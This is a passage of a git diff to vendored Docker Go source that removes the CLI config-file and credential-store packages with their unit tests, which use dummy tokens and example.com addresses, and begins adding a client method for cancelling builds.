File should not have been able to save with no file name.") - } - - tmpHome, err := ioutil.TempDir("", "config-test") - if err != nil { - t.Fatalf("Failed to create a temp dir: %q", err) - } - defer os.RemoveAll(tmpHome) - - fn := filepath.Join(tmpHome, ConfigFileName) - f, _ := os.OpenFile(fn, os.O_WRONLY|os.O_CREATE|os.O_TRUNC, 0600) - defer f.Close() - - err = config.SaveToWriter(f) - if err != nil { - t.Fatalf("Failed saving to file: %q", err) - } - buf, err := ioutil.ReadFile(filepath.Join(tmpHome, ConfigFileName)) - if err != nil { - t.Fatal(err) - } - expConfStr := `{ - "auths": { - "https://index.docker.io/v1/": { - "auth": "am9lam9lOmhlbGxv" - } - }, - "psFormat": "table {{.ID}}\\t{{.Label \"com.docker.label.cpu\"}}" -}` - if string(buf) != expConfStr { - t.Fatalf("Should have save in new form: \n%s\nnot \n%s", string(buf), expConfStr) - } -} - -func TestLegacyJSONSaveWithNoFile(t *testing.T) { - - js := `{"https://index.docker.io/v1/":{"auth":"am9lam9lOmhlbGxv","email":"user@example.com"}}` - config, err := LegacyLoadFromReader(strings.NewReader(js)) - err = config.Save() - if err == nil { - t.Fatalf("Expected error. 
File should not have been able to save with no file name.") - } - - tmpHome, err := ioutil.TempDir("", "config-test") - if err != nil { - t.Fatalf("Failed to create a temp dir: %q", err) - } - defer os.RemoveAll(tmpHome) - - fn := filepath.Join(tmpHome, ConfigFileName) - f, _ := os.OpenFile(fn, os.O_WRONLY|os.O_CREATE|os.O_TRUNC, 0600) - defer f.Close() - - if err = config.SaveToWriter(f); err != nil { - t.Fatalf("Failed saving to file: %q", err) - } - buf, err := ioutil.ReadFile(filepath.Join(tmpHome, ConfigFileName)) - if err != nil { - t.Fatal(err) - } - - expConfStr := `{ - "auths": { - "https://index.docker.io/v1/": { - "auth": "am9lam9lOmhlbGxv", - "email": "user@example.com" - } - } -}` - - if string(buf) != expConfStr { - t.Fatalf("Should have save in new form: \n%s\n not \n%s", string(buf), expConfStr) - } -} diff --git a/vendor/github.com/docker/docker/cliconfig/configfile/file.go b/vendor/github.com/docker/docker/cliconfig/configfile/file.go deleted file mode 100644 index 39097133a4..0000000000 --- a/vendor/github.com/docker/docker/cliconfig/configfile/file.go +++ /dev/null @@ -1,183 +0,0 @@ -package configfile - -import ( - "encoding/base64" - "encoding/json" - "fmt" - "io" - "io/ioutil" - "os" - "path/filepath" - "strings" - - "github.com/docker/docker/api/types" -) - -const ( - // This constant is only used for really old config files when the - // URL wasn't saved as part of the config file and it was just - // assumed to be this value. 
- defaultIndexserver = "https://index.docker.io/v1/" -) - -// ConfigFile ~/.docker/config.json file info -type ConfigFile struct { - AuthConfigs map[string]types.AuthConfig `json:"auths"` - HTTPHeaders map[string]string `json:"HttpHeaders,omitempty"` - PsFormat string `json:"psFormat,omitempty"` - ImagesFormat string `json:"imagesFormat,omitempty"` - NetworksFormat string `json:"networksFormat,omitempty"` - VolumesFormat string `json:"volumesFormat,omitempty"` - StatsFormat string `json:"statsFormat,omitempty"` - DetachKeys string `json:"detachKeys,omitempty"` - CredentialsStore string `json:"credsStore,omitempty"` - CredentialHelpers map[string]string `json:"credHelpers,omitempty"` - Filename string `json:"-"` // Note: for internal use only - ServiceInspectFormat string `json:"serviceInspectFormat,omitempty"` -} - -// LegacyLoadFromReader reads the non-nested configuration data given and sets up the -// auth config information with given directory and populates the receiver object -func (configFile *ConfigFile) LegacyLoadFromReader(configData io.Reader) error { - b, err := ioutil.ReadAll(configData) - if err != nil { - return err - } - - if err := json.Unmarshal(b, &configFile.AuthConfigs); err != nil { - arr := strings.Split(string(b), "\n") - if len(arr) < 2 { - return fmt.Errorf("The Auth config file is empty") - } - authConfig := types.AuthConfig{} - origAuth := strings.Split(arr[0], " = ") - if len(origAuth) != 2 { - return fmt.Errorf("Invalid Auth config file") - } - authConfig.Username, authConfig.Password, err = decodeAuth(origAuth[1]) - if err != nil { - return err - } - authConfig.ServerAddress = defaultIndexserver - configFile.AuthConfigs[defaultIndexserver] = authConfig - } else { - for k, authConfig := range configFile.AuthConfigs { - authConfig.Username, authConfig.Password, err = decodeAuth(authConfig.Auth) - if err != nil { - return err - } - authConfig.Auth = "" - authConfig.ServerAddress = k - configFile.AuthConfigs[k] = authConfig - } - } - 
return nil -} - -// LoadFromReader reads the configuration data given and sets up the auth config -// information with given directory and populates the receiver object -func (configFile *ConfigFile) LoadFromReader(configData io.Reader) error { - if err := json.NewDecoder(configData).Decode(&configFile); err != nil { - return err - } - var err error - for addr, ac := range configFile.AuthConfigs { - ac.Username, ac.Password, err = decodeAuth(ac.Auth) - if err != nil { - return err - } - ac.Auth = "" - ac.ServerAddress = addr - configFile.AuthConfigs[addr] = ac - } - return nil -} - -// ContainsAuth returns whether there is authentication configured -// in this file or not. -func (configFile *ConfigFile) ContainsAuth() bool { - return configFile.CredentialsStore != "" || - len(configFile.CredentialHelpers) > 0 || - len(configFile.AuthConfigs) > 0 -} - -// SaveToWriter encodes and writes out all the authorization information to -// the given writer -func (configFile *ConfigFile) SaveToWriter(writer io.Writer) error { - // Encode sensitive data into a new/temp struct - tmpAuthConfigs := make(map[string]types.AuthConfig, len(configFile.AuthConfigs)) - for k, authConfig := range configFile.AuthConfigs { - authCopy := authConfig - // encode and save the authstring, while blanking out the original fields - authCopy.Auth = encodeAuth(&authCopy) - authCopy.Username = "" - authCopy.Password = "" - authCopy.ServerAddress = "" - tmpAuthConfigs[k] = authCopy - } - - saveAuthConfigs := configFile.AuthConfigs - configFile.AuthConfigs = tmpAuthConfigs - defer func() { configFile.AuthConfigs = saveAuthConfigs }() - - data, err := json.MarshalIndent(configFile, "", "\t") - if err != nil { - return err - } - _, err = writer.Write(data) - return err -} - -// Save encodes and writes out all the authorization information -func (configFile *ConfigFile) Save() error { - if configFile.Filename == "" { - return fmt.Errorf("Can't save config with empty filename") - } - - if err := 
os.MkdirAll(filepath.Dir(configFile.Filename), 0700); err != nil { - return err - } - f, err := os.OpenFile(configFile.Filename, os.O_WRONLY|os.O_CREATE|os.O_TRUNC, 0600) - if err != nil { - return err - } - defer f.Close() - return configFile.SaveToWriter(f) -} - -// encodeAuth creates a base64 encoded string to containing authorization information -func encodeAuth(authConfig *types.AuthConfig) string { - if authConfig.Username == "" && authConfig.Password == "" { - return "" - } - - authStr := authConfig.Username + ":" + authConfig.Password - msg := []byte(authStr) - encoded := make([]byte, base64.StdEncoding.EncodedLen(len(msg))) - base64.StdEncoding.Encode(encoded, msg) - return string(encoded) -} - -// decodeAuth decodes a base64 encoded string and returns username and password -func decodeAuth(authStr string) (string, string, error) { - if authStr == "" { - return "", "", nil - } - - decLen := base64.StdEncoding.DecodedLen(len(authStr)) - decoded := make([]byte, decLen) - authByte := []byte(authStr) - n, err := base64.StdEncoding.Decode(decoded, authByte) - if err != nil { - return "", "", err - } - if n > decLen { - return "", "", fmt.Errorf("Something went wrong decoding auth config") - } - arr := strings.SplitN(string(decoded), ":", 2) - if len(arr) != 2 { - return "", "", fmt.Errorf("Invalid auth configuration file") - } - password := strings.Trim(arr[1], "\x00") - return arr[0], password, nil -} diff --git a/vendor/github.com/docker/docker/cliconfig/configfile/file_test.go b/vendor/github.com/docker/docker/cliconfig/configfile/file_test.go deleted file mode 100644 index 435797f681..0000000000 --- a/vendor/github.com/docker/docker/cliconfig/configfile/file_test.go +++ /dev/null @@ -1,27 +0,0 @@ -package configfile - -import ( - "testing" - - "github.com/docker/docker/api/types" -) - -func TestEncodeAuth(t *testing.T) { - newAuthConfig := &types.AuthConfig{Username: "ken", Password: "test"} - authStr := encodeAuth(newAuthConfig) - decAuthConfig := 
&types.AuthConfig{} - var err error - decAuthConfig.Username, decAuthConfig.Password, err = decodeAuth(authStr) - if err != nil { - t.Fatal(err) - } - if newAuthConfig.Username != decAuthConfig.Username { - t.Fatal("Encode Username doesn't match decoded Username") - } - if newAuthConfig.Password != decAuthConfig.Password { - t.Fatal("Encode Password doesn't match decoded Password") - } - if authStr != "a2VuOnRlc3Q=" { - t.Fatal("AuthString encoding isn't correct.") - } -} diff --git a/vendor/github.com/docker/docker/cliconfig/credentials/credentials.go b/vendor/github.com/docker/docker/cliconfig/credentials/credentials.go deleted file mode 100644 index ca874cac51..0000000000 --- a/vendor/github.com/docker/docker/cliconfig/credentials/credentials.go +++ /dev/null @@ -1,17 +0,0 @@ -package credentials - -import ( - "github.com/docker/docker/api/types" -) - -// Store is the interface that any credentials store must implement. -type Store interface { - // Erase removes credentials from the store for a given server. - Erase(serverAddress string) error - // Get retrieves credentials from the store for a given server. - Get(serverAddress string) (types.AuthConfig, error) - // GetAll retrieves all the credentials from the store. - GetAll() (map[string]types.AuthConfig, error) - // Store saves credentials in the store. - Store(authConfig types.AuthConfig) error -} diff --git a/vendor/github.com/docker/docker/cliconfig/credentials/default_store.go b/vendor/github.com/docker/docker/cliconfig/credentials/default_store.go deleted file mode 100644 index b4733709b1..0000000000 --- a/vendor/github.com/docker/docker/cliconfig/credentials/default_store.go +++ /dev/null @@ -1,22 +0,0 @@ -package credentials - -import ( - "os/exec" - - "github.com/docker/docker/cliconfig/configfile" -) - -// DetectDefaultStore sets the default credentials store -// if the host includes the default store helper program. 
-func DetectDefaultStore(c *configfile.ConfigFile) { - if c.CredentialsStore != "" { - // user defined - return - } - - if defaultCredentialsStore != "" { - if _, err := exec.LookPath(remoteCredentialsPrefix + defaultCredentialsStore); err == nil { - c.CredentialsStore = defaultCredentialsStore - } - } -} diff --git a/vendor/github.com/docker/docker/cliconfig/credentials/default_store_darwin.go b/vendor/github.com/docker/docker/cliconfig/credentials/default_store_darwin.go deleted file mode 100644 index 63e8ed4010..0000000000 --- a/vendor/github.com/docker/docker/cliconfig/credentials/default_store_darwin.go +++ /dev/null @@ -1,3 +0,0 @@ -package credentials - -const defaultCredentialsStore = "osxkeychain" diff --git a/vendor/github.com/docker/docker/cliconfig/credentials/default_store_linux.go b/vendor/github.com/docker/docker/cliconfig/credentials/default_store_linux.go deleted file mode 100644 index 864c540f6c..0000000000 --- a/vendor/github.com/docker/docker/cliconfig/credentials/default_store_linux.go +++ /dev/null @@ -1,3 +0,0 @@ -package credentials - -const defaultCredentialsStore = "secretservice" diff --git a/vendor/github.com/docker/docker/cliconfig/credentials/default_store_unsupported.go b/vendor/github.com/docker/docker/cliconfig/credentials/default_store_unsupported.go deleted file mode 100644 index 519ef53dcd..0000000000 --- a/vendor/github.com/docker/docker/cliconfig/credentials/default_store_unsupported.go +++ /dev/null @@ -1,5 +0,0 @@ -// +build !windows,!darwin,!linux - -package credentials - -const defaultCredentialsStore = "" diff --git a/vendor/github.com/docker/docker/cliconfig/credentials/default_store_windows.go b/vendor/github.com/docker/docker/cliconfig/credentials/default_store_windows.go deleted file mode 100644 index fb6a9745cf..0000000000 --- a/vendor/github.com/docker/docker/cliconfig/credentials/default_store_windows.go +++ /dev/null @@ -1,3 +0,0 @@ -package credentials - -const defaultCredentialsStore = "wincred" diff --git 
a/vendor/github.com/docker/docker/cliconfig/credentials/file_store.go b/vendor/github.com/docker/docker/cliconfig/credentials/file_store.go deleted file mode 100644 index ca73a384d4..0000000000 --- a/vendor/github.com/docker/docker/cliconfig/credentials/file_store.go +++ /dev/null @@ -1,53 +0,0 @@ -package credentials - -import ( - "github.com/docker/docker/api/types" - "github.com/docker/docker/cliconfig/configfile" - "github.com/docker/docker/registry" -) - -// fileStore implements a credentials store using -// the docker configuration file to keep the credentials in plain text. -type fileStore struct { - file *configfile.ConfigFile -} - -// NewFileStore creates a new file credentials store. -func NewFileStore(file *configfile.ConfigFile) Store { - return &fileStore{ - file: file, - } -} - -// Erase removes the given credentials from the file store. -func (c *fileStore) Erase(serverAddress string) error { - delete(c.file.AuthConfigs, serverAddress) - return c.file.Save() -} - -// Get retrieves credentials for a specific server from the file store. -func (c *fileStore) Get(serverAddress string) (types.AuthConfig, error) { - authConfig, ok := c.file.AuthConfigs[serverAddress] - if !ok { - // Maybe they have a legacy config file, we will iterate the keys converting - // them to the new format and testing - for r, ac := range c.file.AuthConfigs { - if serverAddress == registry.ConvertToHostname(r) { - return ac, nil - } - } - - authConfig = types.AuthConfig{} - } - return authConfig, nil -} - -func (c *fileStore) GetAll() (map[string]types.AuthConfig, error) { - return c.file.AuthConfigs, nil -} - -// Store saves the given credentials in the file store. 
-func (c *fileStore) Store(authConfig types.AuthConfig) error { - c.file.AuthConfigs[authConfig.ServerAddress] = authConfig - return c.file.Save() -} diff --git a/vendor/github.com/docker/docker/cliconfig/credentials/file_store_test.go b/vendor/github.com/docker/docker/cliconfig/credentials/file_store_test.go deleted file mode 100644 index efed4e9040..0000000000 --- a/vendor/github.com/docker/docker/cliconfig/credentials/file_store_test.go +++ /dev/null @@ -1,139 +0,0 @@ -package credentials - -import ( - "io/ioutil" - "testing" - - "github.com/docker/docker/api/types" - "github.com/docker/docker/cliconfig" - "github.com/docker/docker/cliconfig/configfile" -) - -func newConfigFile(auths map[string]types.AuthConfig) *configfile.ConfigFile { - tmp, _ := ioutil.TempFile("", "docker-test") - name := tmp.Name() - tmp.Close() - - c := cliconfig.NewConfigFile(name) - c.AuthConfigs = auths - return c -} - -func TestFileStoreAddCredentials(t *testing.T) { - f := newConfigFile(make(map[string]types.AuthConfig)) - - s := NewFileStore(f) - err := s.Store(types.AuthConfig{ - Auth: "super_secret_token", - Email: "foo@example.com", - ServerAddress: "https://example.com", - }) - - if err != nil { - t.Fatal(err) - } - - if len(f.AuthConfigs) != 1 { - t.Fatalf("expected 1 auth config, got %d", len(f.AuthConfigs)) - } - - a, ok := f.AuthConfigs["https://example.com"] - if !ok { - t.Fatalf("expected auth for https://example.com, got %v", f.AuthConfigs) - } - if a.Auth != "super_secret_token" { - t.Fatalf("expected auth `super_secret_token`, got %s", a.Auth) - } - if a.Email != "foo@example.com" { - t.Fatalf("expected email `foo@example.com`, got %s", a.Email) - } -} - -func TestFileStoreGet(t *testing.T) { - f := newConfigFile(map[string]types.AuthConfig{ - "https://example.com": { - Auth: "super_secret_token", - Email: "foo@example.com", - ServerAddress: "https://example.com", - }, - }) - - s := NewFileStore(f) - a, err := s.Get("https://example.com") - if err != nil { - t.Fatal(err) 
- } - if a.Auth != "super_secret_token" { - t.Fatalf("expected auth `super_secret_token`, got %s", a.Auth) - } - if a.Email != "foo@example.com" { - t.Fatalf("expected email `foo@example.com`, got %s", a.Email) - } -} - -func TestFileStoreGetAll(t *testing.T) { - s1 := "https://example.com" - s2 := "https://example2.com" - f := newConfigFile(map[string]types.AuthConfig{ - s1: { - Auth: "super_secret_token", - Email: "foo@example.com", - ServerAddress: "https://example.com", - }, - s2: { - Auth: "super_secret_token2", - Email: "foo@example2.com", - ServerAddress: "https://example2.com", - }, - }) - - s := NewFileStore(f) - as, err := s.GetAll() - if err != nil { - t.Fatal(err) - } - if len(as) != 2 { - t.Fatalf("wanted 2, got %d", len(as)) - } - if as[s1].Auth != "super_secret_token" { - t.Fatalf("expected auth `super_secret_token`, got %s", as[s1].Auth) - } - if as[s1].Email != "foo@example.com" { - t.Fatalf("expected email `foo@example.com`, got %s", as[s1].Email) - } - if as[s2].Auth != "super_secret_token2" { - t.Fatalf("expected auth `super_secret_token2`, got %s", as[s2].Auth) - } - if as[s2].Email != "foo@example2.com" { - t.Fatalf("expected email `foo@example2.com`, got %s", as[s2].Email) - } -} - -func TestFileStoreErase(t *testing.T) { - f := newConfigFile(map[string]types.AuthConfig{ - "https://example.com": { - Auth: "super_secret_token", - Email: "foo@example.com", - ServerAddress: "https://example.com", - }, - }) - - s := NewFileStore(f) - err := s.Erase("https://example.com") - if err != nil { - t.Fatal(err) - } - - // file store never returns errors, check that the auth config is empty - a, err := s.Get("https://example.com") - if err != nil { - t.Fatal(err) - } - - if a.Auth != "" { - t.Fatalf("expected empty auth token, got %s", a.Auth) - } - if a.Email != "" { - t.Fatalf("expected empty email, got %s", a.Email) - } -} diff --git a/vendor/github.com/docker/docker/cliconfig/credentials/native_store.go 
b/vendor/github.com/docker/docker/cliconfig/credentials/native_store.go deleted file mode 100644 index dec2dbcb82..0000000000 --- a/vendor/github.com/docker/docker/cliconfig/credentials/native_store.go +++ /dev/null @@ -1,144 +0,0 @@ -package credentials - -import ( - "github.com/docker/docker-credential-helpers/client" - "github.com/docker/docker-credential-helpers/credentials" - "github.com/docker/docker/api/types" - "github.com/docker/docker/cliconfig/configfile" -) - -const ( - remoteCredentialsPrefix = "docker-credential-" - tokenUsername = "" -) - -// nativeStore implements a credentials store -// using native keychain to keep credentials secure. -// It piggybacks into a file store to keep users' emails. -type nativeStore struct { - programFunc client.ProgramFunc - fileStore Store -} - -// NewNativeStore creates a new native store that -// uses a remote helper program to manage credentials. -func NewNativeStore(file *configfile.ConfigFile, helperSuffix string) Store { - name := remoteCredentialsPrefix + helperSuffix - return &nativeStore{ - programFunc: client.NewShellProgramFunc(name), - fileStore: NewFileStore(file), - } -} - -// Erase removes the given credentials from the native store. -func (c *nativeStore) Erase(serverAddress string) error { - if err := client.Erase(c.programFunc, serverAddress); err != nil { - return err - } - - // Fallback to plain text store to remove email - return c.fileStore.Erase(serverAddress) -} - -// Get retrieves credentials for a specific server from the native store. -func (c *nativeStore) Get(serverAddress string) (types.AuthConfig, error) { - // load user email if it exist or an empty auth config. 
- auth, _ := c.fileStore.Get(serverAddress) - - creds, err := c.getCredentialsFromStore(serverAddress) - if err != nil { - return auth, err - } - auth.Username = creds.Username - auth.IdentityToken = creds.IdentityToken - auth.Password = creds.Password - - return auth, nil -} - -// GetAll retrieves all the credentials from the native store. -func (c *nativeStore) GetAll() (map[string]types.AuthConfig, error) { - auths, err := c.listCredentialsInStore() - if err != nil { - return nil, err - } - - // Emails are only stored in the file store. - // This call can be safely eliminated when emails are removed. - fileConfigs, _ := c.fileStore.GetAll() - - authConfigs := make(map[string]types.AuthConfig) - for registry := range auths { - creds, err := c.getCredentialsFromStore(registry) - if err != nil { - return nil, err - } - ac, _ := fileConfigs[registry] // might contain Email - ac.Username = creds.Username - ac.Password = creds.Password - ac.IdentityToken = creds.IdentityToken - authConfigs[registry] = ac - } - - return authConfigs, nil -} - -// Store saves the given credentials in the file store. -func (c *nativeStore) Store(authConfig types.AuthConfig) error { - if err := c.storeCredentialsInStore(authConfig); err != nil { - return err - } - authConfig.Username = "" - authConfig.Password = "" - authConfig.IdentityToken = "" - - // Fallback to old credential in plain text to save only the email - return c.fileStore.Store(authConfig) -} - -// storeCredentialsInStore executes the command to store the credentials in the native store. 
-func (c *nativeStore) storeCredentialsInStore(config types.AuthConfig) error { - creds := &credentials.Credentials{ - ServerURL: config.ServerAddress, - Username: config.Username, - Secret: config.Password, - } - - if config.IdentityToken != "" { - creds.Username = tokenUsername - creds.Secret = config.IdentityToken - } - - return client.Store(c.programFunc, creds) -} - -// getCredentialsFromStore executes the command to get the credentials from the native store. -func (c *nativeStore) getCredentialsFromStore(serverAddress string) (types.AuthConfig, error) { - var ret types.AuthConfig - - creds, err := client.Get(c.programFunc, serverAddress) - if err != nil { - if credentials.IsErrCredentialsNotFound(err) { - // do not return an error if the credentials are not - // in the keyckain. Let docker ask for new credentials. - return ret, nil - } - return ret, err - } - - if creds.Username == tokenUsername { - ret.IdentityToken = creds.Secret - } else { - ret.Password = creds.Secret - ret.Username = creds.Username - } - - ret.ServerAddress = serverAddress - return ret, nil -} - -// listCredentialsInStore returns a listing of stored credentials as a map of -// URL -> username. 
-func (c *nativeStore) listCredentialsInStore() (map[string]string, error) { - return client.List(c.programFunc) -} diff --git a/vendor/github.com/docker/docker/cliconfig/credentials/native_store_test.go b/vendor/github.com/docker/docker/cliconfig/credentials/native_store_test.go deleted file mode 100644 index 7664faf9e1..0000000000 --- a/vendor/github.com/docker/docker/cliconfig/credentials/native_store_test.go +++ /dev/null @@ -1,355 +0,0 @@ -package credentials - -import ( - "encoding/json" - "fmt" - "io" - "io/ioutil" - "strings" - "testing" - - "github.com/docker/docker-credential-helpers/client" - "github.com/docker/docker-credential-helpers/credentials" - "github.com/docker/docker/api/types" -) - -const ( - validServerAddress = "https://index.docker.io/v1" - validServerAddress2 = "https://example.com:5002" - invalidServerAddress = "https://foobar.example.com" - missingCredsAddress = "https://missing.docker.io/v1" -) - -var errCommandExited = fmt.Errorf("exited 1") - -// mockCommand simulates interactions between the docker client and a remote -// credentials helper. -// Unit tests inject this mocked command into the remote to control execution. -type mockCommand struct { - arg string - input io.Reader -} - -// Output returns responses from the remote credentials helper. -// It mocks those responses based in the input in the mock. 
-func (m *mockCommand) Output() ([]byte, error) { - in, err := ioutil.ReadAll(m.input) - if err != nil { - return nil, err - } - inS := string(in) - - switch m.arg { - case "erase": - switch inS { - case validServerAddress: - return nil, nil - default: - return []byte("program failed"), errCommandExited - } - case "get": - switch inS { - case validServerAddress: - return []byte(`{"Username": "foo", "Secret": "bar"}`), nil - case validServerAddress2: - return []byte(`{"Username": "", "Secret": "abcd1234"}`), nil - case missingCredsAddress: - return []byte(credentials.NewErrCredentialsNotFound().Error()), errCommandExited - case invalidServerAddress: - return []byte("program failed"), errCommandExited - } - case "store": - var c credentials.Credentials - err := json.NewDecoder(strings.NewReader(inS)).Decode(&c) - if err != nil { - return []byte("program failed"), errCommandExited - } - switch c.ServerURL { - case validServerAddress: - return nil, nil - default: - return []byte("program failed"), errCommandExited - } - case "list": - return []byte(fmt.Sprintf(`{"%s": "%s", "%s": "%s"}`, validServerAddress, "foo", validServerAddress2, "")), nil - } - - return []byte(fmt.Sprintf("unknown argument %q with %q", m.arg, inS)), errCommandExited -} - -// Input sets the input to send to a remote credentials helper. 
-func (m *mockCommand) Input(in io.Reader) { - m.input = in -} - -func mockCommandFn(args ...string) client.Program { - return &mockCommand{ - arg: args[0], - } -} - -func TestNativeStoreAddCredentials(t *testing.T) { - f := newConfigFile(make(map[string]types.AuthConfig)) - f.CredentialsStore = "mock" - - s := &nativeStore{ - programFunc: mockCommandFn, - fileStore: NewFileStore(f), - } - err := s.Store(types.AuthConfig{ - Username: "foo", - Password: "bar", - Email: "foo@example.com", - ServerAddress: validServerAddress, - }) - - if err != nil { - t.Fatal(err) - } - - if len(f.AuthConfigs) != 1 { - t.Fatalf("expected 1 auth config, got %d", len(f.AuthConfigs)) - } - - a, ok := f.AuthConfigs[validServerAddress] - if !ok { - t.Fatalf("expected auth for %s, got %v", validServerAddress, f.AuthConfigs) - } - if a.Auth != "" { - t.Fatalf("expected auth to be empty, got %s", a.Auth) - } - if a.Username != "" { - t.Fatalf("expected username to be empty, got %s", a.Username) - } - if a.Password != "" { - t.Fatalf("expected password to be empty, got %s", a.Password) - } - if a.IdentityToken != "" { - t.Fatalf("expected identity token to be empty, got %s", a.IdentityToken) - } - if a.Email != "foo@example.com" { - t.Fatalf("expected email `foo@example.com`, got %s", a.Email) - } -} - -func TestNativeStoreAddInvalidCredentials(t *testing.T) { - f := newConfigFile(make(map[string]types.AuthConfig)) - f.CredentialsStore = "mock" - - s := &nativeStore{ - programFunc: mockCommandFn, - fileStore: NewFileStore(f), - } - err := s.Store(types.AuthConfig{ - Username: "foo", - Password: "bar", - Email: "foo@example.com", - ServerAddress: invalidServerAddress, - }) - - if err == nil { - t.Fatal("expected error, got nil") - } - - if !strings.Contains(err.Error(), "program failed") { - t.Fatalf("expected `program failed`, got %v", err) - } - - if len(f.AuthConfigs) != 0 { - t.Fatalf("expected 0 auth config, got %d", len(f.AuthConfigs)) - } -} - -func TestNativeStoreGet(t *testing.T) { - 
f := newConfigFile(map[string]types.AuthConfig{ - validServerAddress: { - Email: "foo@example.com", - }, - }) - f.CredentialsStore = "mock" - - s := &nativeStore{ - programFunc: mockCommandFn, - fileStore: NewFileStore(f), - } - a, err := s.Get(validServerAddress) - if err != nil { - t.Fatal(err) - } - - if a.Username != "foo" { - t.Fatalf("expected username `foo`, got %s", a.Username) - } - if a.Password != "bar" { - t.Fatalf("expected password `bar`, got %s", a.Password) - } - if a.IdentityToken != "" { - t.Fatalf("expected identity token to be empty, got %s", a.IdentityToken) - } - if a.Email != "foo@example.com" { - t.Fatalf("expected email `foo@example.com`, got %s", a.Email) - } -} - -func TestNativeStoreGetIdentityToken(t *testing.T) { - f := newConfigFile(map[string]types.AuthConfig{ - validServerAddress2: { - Email: "foo@example2.com", - }, - }) - f.CredentialsStore = "mock" - - s := &nativeStore{ - programFunc: mockCommandFn, - fileStore: NewFileStore(f), - } - a, err := s.Get(validServerAddress2) - if err != nil { - t.Fatal(err) - } - - if a.Username != "" { - t.Fatalf("expected username to be empty, got %s", a.Username) - } - if a.Password != "" { - t.Fatalf("expected password to be empty, got %s", a.Password) - } - if a.IdentityToken != "abcd1234" { - t.Fatalf("expected identity token `abcd1234`, got %s", a.IdentityToken) - } - if a.Email != "foo@example2.com" { - t.Fatalf("expected email `foo@example2.com`, got %s", a.Email) - } -} - -func TestNativeStoreGetAll(t *testing.T) { - f := newConfigFile(map[string]types.AuthConfig{ - validServerAddress: { - Email: "foo@example.com", - }, - }) - f.CredentialsStore = "mock" - - s := &nativeStore{ - programFunc: mockCommandFn, - fileStore: NewFileStore(f), - } - as, err := s.GetAll() - if err != nil { - t.Fatal(err) - } - - if len(as) != 2 { - t.Fatalf("wanted 2, got %d", len(as)) - } - - if as[validServerAddress].Username != "foo" { - t.Fatalf("expected username `foo` for %s, got %s", validServerAddress, 
as[validServerAddress].Username) - } - if as[validServerAddress].Password != "bar" { - t.Fatalf("expected password `bar` for %s, got %s", validServerAddress, as[validServerAddress].Password) - } - if as[validServerAddress].IdentityToken != "" { - t.Fatalf("expected identity to be empty for %s, got %s", validServerAddress, as[validServerAddress].IdentityToken) - } - if as[validServerAddress].Email != "foo@example.com" { - t.Fatalf("expected email `foo@example.com` for %s, got %s", validServerAddress, as[validServerAddress].Email) - } - if as[validServerAddress2].Username != "" { - t.Fatalf("expected username to be empty for %s, got %s", validServerAddress2, as[validServerAddress2].Username) - } - if as[validServerAddress2].Password != "" { - t.Fatalf("expected password to be empty for %s, got %s", validServerAddress2, as[validServerAddress2].Password) - } - if as[validServerAddress2].IdentityToken != "abcd1234" { - t.Fatalf("expected identity token `abcd1324` for %s, got %s", validServerAddress2, as[validServerAddress2].IdentityToken) - } - if as[validServerAddress2].Email != "" { - t.Fatalf("expected no email for %s, got %s", validServerAddress2, as[validServerAddress2].Email) - } -} - -func TestNativeStoreGetMissingCredentials(t *testing.T) { - f := newConfigFile(map[string]types.AuthConfig{ - validServerAddress: { - Email: "foo@example.com", - }, - }) - f.CredentialsStore = "mock" - - s := &nativeStore{ - programFunc: mockCommandFn, - fileStore: NewFileStore(f), - } - _, err := s.Get(missingCredsAddress) - if err != nil { - // missing credentials do not produce an error - t.Fatal(err) - } -} - -func TestNativeStoreGetInvalidAddress(t *testing.T) { - f := newConfigFile(map[string]types.AuthConfig{ - validServerAddress: { - Email: "foo@example.com", - }, - }) - f.CredentialsStore = "mock" - - s := &nativeStore{ - programFunc: mockCommandFn, - fileStore: NewFileStore(f), - } - _, err := s.Get(invalidServerAddress) - if err == nil { - t.Fatal("expected error, got 
nil") - } - - if !strings.Contains(err.Error(), "program failed") { - t.Fatalf("expected `program failed`, got %v", err) - } -} - -func TestNativeStoreErase(t *testing.T) { - f := newConfigFile(map[string]types.AuthConfig{ - validServerAddress: { - Email: "foo@example.com", - }, - }) - f.CredentialsStore = "mock" - - s := &nativeStore{ - programFunc: mockCommandFn, - fileStore: NewFileStore(f), - } - err := s.Erase(validServerAddress) - if err != nil { - t.Fatal(err) - } - - if len(f.AuthConfigs) != 0 { - t.Fatalf("expected 0 auth configs, got %d", len(f.AuthConfigs)) - } -} - -func TestNativeStoreEraseInvalidAddress(t *testing.T) { - f := newConfigFile(map[string]types.AuthConfig{ - validServerAddress: { - Email: "foo@example.com", - }, - }) - f.CredentialsStore = "mock" - - s := &nativeStore{ - programFunc: mockCommandFn, - fileStore: NewFileStore(f), - } - err := s.Erase(invalidServerAddress) - if err == nil { - t.Fatal("expected error, got nil") - } - - if !strings.Contains(err.Error(), "program failed") { - t.Fatalf("expected `program failed`, got %v", err) - } -} diff --git a/vendor/github.com/docker/docker/client/build_cancel.go b/vendor/github.com/docker/docker/client/build_cancel.go new file mode 100644 index 0000000000..4cf8c980a9 --- /dev/null +++ b/vendor/github.com/docker/docker/client/build_cancel.go @@ -0,0 +1,21 @@ +package client // import "github.com/docker/docker/client" + +import ( + "net/url" + + "golang.org/x/net/context" +) + +// BuildCancel requests the daemon to cancel ongoing build request +func (cli *Client) BuildCancel(ctx context.Context, id string) error { + query := url.Values{} + query.Set("id", id) + + serverResp, err := cli.post(ctx, "/build/cancel", query, nil, nil) + if err != nil { + return err + } + defer ensureReaderClosed(serverResp) + + return nil +} diff --git a/vendor/github.com/docker/docker/client/build_prune.go b/vendor/github.com/docker/docker/client/build_prune.go new file mode 100644 index 0000000000..c4772a04e7 --- 
